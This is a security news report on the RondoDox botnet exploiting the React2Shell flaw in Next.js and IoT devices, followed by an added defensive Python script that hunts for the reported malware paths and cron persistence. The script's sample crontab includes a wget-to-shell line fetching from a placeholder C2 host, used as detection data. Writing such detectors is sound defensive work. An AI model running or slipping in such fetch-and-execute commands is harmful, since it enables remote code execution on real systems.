RondoDox Botnet Abuses Critical React2Shell Vulnerability to Hijack IoT Devices and Web Servers

Cybersecurity researchers have uncovered a prolonged nine-month campaign that targeted Internet of Things (IoT) devices and web applications to recruit them into a botnet named RondoDox.

As of December 2025, threat actors have been observed exploiting the newly disclosed React2Shell vulnerability (CVE-2025-55182, CVSS 10.0) to gain unauthorized access to vulnerable systems, according to an analysis by CloudSEK.

React2Shell is a critical security flaw affecting React Server Components (RSC) and Next.js, enabling unauthenticated attackers to execute code remotely on affected systems. The Shadowserver Foundation reports approximately 90,300 systems remain exposed globally, with the highest concentration in the United States (68,400), followed by Germany (4,300), France (2,800), and India (1,500).

RondoDox, active since early 2025, has expanded its attack methods by incorporating additional N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. Prior analyses by Darktrace, Kaspersky, and VulnCheck have already highlighted its abuse of React2Shell for botnet propagation.

The RondoDox campaign progressed through three key phases before exploiting CVE-2025-55182:

  • March – April 2025: Initial reconnaissance and manual vulnerability scanning
  • April – June 2025: Daily large-scale scanning of web apps such as WordPress, Drupal, Struts2, and IoT devices like Wavlink routers
  • July – Early December 2025: Hourly automated deployment on a massive scale

In December 2025, attackers scanned for vulnerable Next.js servers and deployed multiple malicious components, including cryptocurrency miners (“/nuts/poop”), a botnet loader and health checker (“/nuts/bolts”), and a Mirai botnet variant (“/nuts/x86”).

The “/nuts/bolts” tool terminates competing malware and coin miners before downloading the main bot binary from its command-and-control (C2) server. Some variants also remove traces of previous infections, Docker payloads, and cron jobs, and then establish persistence via “/etc/crontab”.

CloudSEK noted, “The tool continuously monitors /proc and kills any non-whitelisted processes every 45 seconds, effectively preventing reinfection by rival malware.”

To reduce the threat, organizations are urged to update Next.js to a patched version, isolate IoT devices on dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor for suspicious processes, and block known C2 servers.
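The loader behaviour described above (components dropped under /nuts/, persistence written to /etc/crontab) and the advice to monitor for suspicious processes can be turned into a small offline hunt script. The following is an added example and not code from the article, CloudSEK, or any vendor it cites. It assumes a Linux host with procfs; the function names, the generic download-and-execute cron heuristic, and the sample process list and crontab are constructed for illustration, and the only campaign-specific indicators it uses are the three paths reported in the article.

```python
"""Offline hunt for the RondoDox artefacts the article reports:
component paths under /nuts/ and persistence entries in /etc/crontab.

Helper names, the cron heuristic and the sample data are this example's own
(assumptions), not tooling from CloudSEK or any other vendor in the article.
"""
import os
import re

# Component paths reported in the article. Anything else here is an assumption.
KNOWN_COMPONENT_PATHS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")

# Generic download-and-execute pattern for cron entries. Assumption: this is a
# common persistence shape worth review, not a RondoDox-specific indicator.
DOWNLOAD_EXEC_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def collect_proc_cmdlines():
    """Read /proc/<pid>/cmdline for every live process (Linux only).

    Returns {pid: argv list}. Processes that exit mid-scan are skipped.
    """
    result = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as fh:
                raw = fh.read()
        except OSError:
            continue
        result[int(entry)] = [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]
    return result


def find_suspect_processes(cmdlines):
    """Return [(pid, argv)] for processes whose argv mentions a known component path.

    `cmdlines` has the shape returned by collect_proc_cmdlines(), so the same
    function runs over a captured snapshot or the live system.
    """
    hits = []
    for pid, argv in sorted(cmdlines.items()):
        joined = " ".join(argv)
        if any(path in joined for path in KNOWN_COMPONENT_PATHS):
            hits.append((pid, argv))
    return hits


def find_suspect_crontab_entries(lines):
    """Return [(line_no, reason, line)] for crontab lines that merit review.

    Comments, blank lines and variable assignments (SHELL=, PATH=) carry no
    command and are skipped.
    """
    findings = []
    for no, line in enumerate(lines, start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or re.match(r"^[A-Za-z_]+=", stripped):
            continue
        if any(path in stripped for path in KNOWN_COMPONENT_PATHS):
            findings.append((no, "known component path", stripped))
        elif DOWNLOAD_EXEC_RE.search(stripped):
            findings.append((no, "download-and-execute pipeline", stripped))
    return findings


# Constructed sample data for an offline run; not captured from a real host.
SAMPLE_CMDLINES = {
    1: ["/sbin/init"],
    412: ["/usr/sbin/sshd", "-D"],
    2231: ["/nuts/bolts"],
    2250: ["/nuts/x86"],
    3001: ["node", "server.js"],
}

SAMPLE_CRONTAB = [
    "# /etc/crontab: system-wide crontab (constructed sample)",
    "SHELL=/bin/sh",
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin",
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly",
    "*/5 * * * * root /nuts/bolts",
    "@reboot root wget -q -O - http://c2-placeholder.example/stage1 | sh",
]

if __name__ == "__main__":
    for pid, argv in find_suspect_processes(SAMPLE_CMDLINES):
        print(f"process {pid}: {' '.join(argv)}")
    for no, reason, line in find_suspect_crontab_entries(SAMPLE_CRONTAB):
        print(f"crontab line {no} ({reason}): {line}")
```

On a live host, replace SAMPLE_CMDLINES with collect_proc_cmdlines() and feed the lines of /etc/crontab (and the per-user spool files, which the article does not mention) to find_suspect_crontab_entries. The three paths are only the indicators reported for this campaign, so an empty result is not evidence of a clean host; the generic cron heuristic is there to catch the persistence shape even when the file names change.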
